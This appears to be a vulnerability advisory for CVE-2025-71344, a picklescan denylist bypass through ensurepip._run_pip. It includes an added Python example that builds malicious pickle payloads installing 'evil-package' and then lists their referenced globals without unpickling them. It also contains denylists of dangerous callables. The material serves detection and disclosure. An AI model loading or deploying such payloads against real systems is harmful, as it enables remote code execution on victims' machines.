PT-2026-51384 · Picklescan · Picklescan
Fredericdt
·
Published
2026-06-22
·
Updated
2026-06-22
·
CVE-2025-71344
CVSS v3.1
8.1
High
| Vector | AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N |
picklescan before 0.0.30 (affected versions 0.0.26 and earlier) fails to flag the standard-library function ensurepip._run_pip when scanning pickle files, allowing attackers to execute arbitrary code. A malicious pickle whose __reduce__ method returns ensurepip._run_pip with attacker-chosen arguments passes picklescan's checks; because _run_pip invokes pip with those arguments, the payload can install an attacker-controlled package and achieves remote code execution as soon as the victim calls pickle.load() on the file.
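The following is an added example, not picklescan's own code and not part of the advisory. It builds two constructed payloads that reference ensurepip._run_pip from __reduce__ (one hand-written in protocol 0, which encodes the callable with the GLOBAL opcode, and one produced by pickle.dumps at protocol 4, which uses STACK_GLOBAL), then walks the opcode stream with pickletools.genops to list every module/name pair the pickle would import, without ever unpickling it. The Dropper class, the payload bytes, and the OLD_DENYLIST / NEW_DENYLIST tables are illustrative constructions; they are not picklescan's real data.

```python
"""Added example: listing the globals a pickle references without loading it."""
import pickle
import pickletools
import ensurepip  # referenced only so pickle.dumps can record module/name; never called


# Constructed protocol-0 payload. 'c' is GLOBAL with "module\nname\n" as argument;
# the remaining opcodes build (["install", "evil-package"],) and REDUCE it.
PAYLOAD_P0 = (
    b"censurepip\n_run_pip\n"   # GLOBAL ensurepip._run_pip
    b"((lp0\n"                   # MARK, MARK, LIST, PUT 0   -> []
    b"S'install'\na"             # STRING 'install', APPEND
    b"S'evil-package'\na"        # STRING 'evil-package', APPEND
    b"t"                         # TUPLE -> (['install', 'evil-package'],)
    b"R"                         # REDUCE -> _run_pip(['install', 'evil-package'])
    b"."                         # STOP
)


class Dropper:
    """Constructed stand-in for a malicious object; its __reduce__ names _run_pip."""

    def __reduce__(self):
        return (ensurepip._run_pip, (["install", "evil-package"],))


# Protocol 4 emits the callable as two SHORT_BINUNICODE strings + STACK_GLOBAL.
PAYLOAD_P4 = pickle.dumps(Dropper(), protocol=4)

# Illustrative denylists (assumption: picklescan's real tables differ). The first
# models a scanner that knows nothing about ensurepip, the second adds the entry.
OLD_DENYLIST = {
    ("os", "system"),
    ("subprocess", "Popen"),
    ("builtins", "eval"),
    ("builtins", "exec"),
}
NEW_DENYLIST = OLD_DENYLIST | {("ensurepip", "_run_pip")}

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING", "UNICODE",
              "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
PUT_OPS = {"PUT", "BINPUT", "LONG_BINPUT"}
GET_OPS = {"GET", "BINGET", "LONG_BINGET"}


def referenced_globals(data: bytes) -> list[tuple[str, str]]:
    """Return every (module, name) pair the pickle would import, in order.

    GLOBAL carries both names in its argument. STACK_GLOBAL takes them from the
    two most recently pushed strings, which may arrive via the memo (BINGET)
    when a module name repeats, so a small memo table is mirrored here.
    """
    found: list[tuple[str, str]] = []
    recent: list[str] = []   # strings pushed so far, in order
    memo: dict = {}
    last = None              # value pushed by the previous opcode, if a string
    for op, arg, _pos in pickletools.genops(data):
        if op.name == "GLOBAL":
            module, name = arg.split(" ", 1)   # genops joins the pair with a space
            found.append((module, name))
            last = None
        elif op.name == "STACK_GLOBAL":
            if len(recent) < 2:
                raise ValueError("STACK_GLOBAL without two preceding strings")
            found.append((recent[-2], recent[-1]))
            last = None
        elif op.name in STRING_OPS:
            last = arg
            recent.append(arg)
        elif op.name == "MEMOIZE":
            memo[len(memo)] = last
        elif op.name in PUT_OPS:
            memo[arg] = last
        elif op.name in GET_OPS:
            last = memo.get(arg)
            if isinstance(last, str):
                recent.append(last)
        else:
            last = None
    return found


def scan(data: bytes, denylist: set[tuple[str, str]]) -> list[tuple[str, str]]:
    """Return the denylisted globals found in the pickle (empty list == 'clean')."""
    return sorted({g for g in referenced_globals(data) if g in denylist})


if __name__ == "__main__":
    for label, payload in (("protocol 0", PAYLOAD_P0), ("protocol 4", PAYLOAD_P4)):
        print(label, "references:", referenced_globals(payload))
        print("  old denylist:", scan(payload, OLD_DENYLIST) or "clean (missed)")
        print("  new denylist:", scan(payload, NEW_DENYLIST))
```

Both payloads reference exactly one global, ensurepip._run_pip; the old denylist reports them as clean, the updated one flags them. Nothing here calls pickle.load or pickle.loads, which is the only safe way to inspect an untrusted pickle: the reference is visible in the opcode stream long before any code would run.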
Fix
Weakness Enumeration
Deserialization of Untrusted Data
Related Identifiers
Affected Products
Picklescan